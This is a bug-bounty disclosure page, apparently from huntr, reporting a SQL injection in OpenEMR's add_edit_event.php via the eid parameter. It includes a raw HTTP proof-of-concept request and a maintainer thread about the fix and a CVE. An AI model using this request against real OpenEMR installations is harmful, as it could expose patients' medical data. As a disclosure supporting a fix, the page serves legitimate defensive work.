We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

SQL injection in the delete action of the file add_edit_event.php in openemr/openemr

Valid

Reported on

Apr 30th 2023

Description

We have discovered that the SQL injection vulnerability can be exploited through the file /interface/main/calendar/add_edit_event.php, allowing an attacker to manipulate the query via the eid parameter provided that Support Multi-Provider Events feature must be enabled.

Proof of Concept

REQUEST:

POST /openemr/interface/main/calendar/add_edit_event.php?eid=1' HTTP/1.1
Host: localhost:8888
Content-Length: 75
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: OpenEMR=uqIwdZamDUi602vL9TYGfvL6lrf1Pun7PZlxnFoIcLsDkOGO
Connection: close

csrf_token_form=5f89af4268e0b669fbaf22fe3627e880290f6d46&form_action=delete

Evidence

Impact

An attacker can modify the query and get all the data in the database.

We are processing your report and will contact the openemr team within 24 hours. 5 months ago
We have contacted a member of the openemr team and are waiting to hear back 5 months ago
stephen waite validated this vulnerability 5 months ago

Thanks @Nhien.IT, have a fix in progress.

Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Nhien.IT
5 months ago

Researcher

Hi @stephenwaite,

Thank you for confirming this report. If you don't mind can you assign the CVE ID for this vulnerability? Because I need it for my work.

stephen waite gave praise 5 months ago
hi @Nhien.IT, this is fixed in https://github.com/openemr/openemr/commit/391f2f98cbd6faa30bfdffb80af1461fc55a10a5 but we are unable to mark this as fixed, since that requires hard-setting a publish date, which am unable to safely predict. We plan to release OpenEMR 7.0.1 patch 1 in about 1-3 weeks, which will include this fix. At that time (after release OpenEMR 7.0.1), we will then mark this issue as fixed (and publish at that time with a cve). Thanks again for the report!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Nhien.IT
4 months ago

Researcher

Hi @maintainer,

any update here?

Nhien.IT
3 months ago

Researcher

Hi @maintainer @admin,

Any update here????? I just received an email that OpenEMR 7.0.1 Patch 1 has been released!!

Regards

Ben Harvie
3 months ago

Admin

Hi Nhien.IT, if you have the patch commit SHA and fixed version, we can manually mark this as fixed. We will require maintainer confirmation for a CVE to be assigned and published however. Thanks!

Nhien.IT
3 months ago

Researcher

Hi @admin,

The patch is committed at https://github.com/openemr/openemr/commit/391f2f98cbd6faa30bfdffb80af1461fc55a10a5 and I have received an email about the openERM 7.0.1 patch

Thanks

Nhien.IT
3 months ago

Researcher

Hi @admin @maintainer,

Any new updates here? It's been quite a while since the patch was announced and I haven't received a response from @maintainer. Hope @admin help!!!!

Thanks

Ben Harvie marked this as fixed in master with commit 391f2f 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Ben Harvie published this vulnerability 2 months ago
add_edit_event.php#L780 has been validated
to join this conversation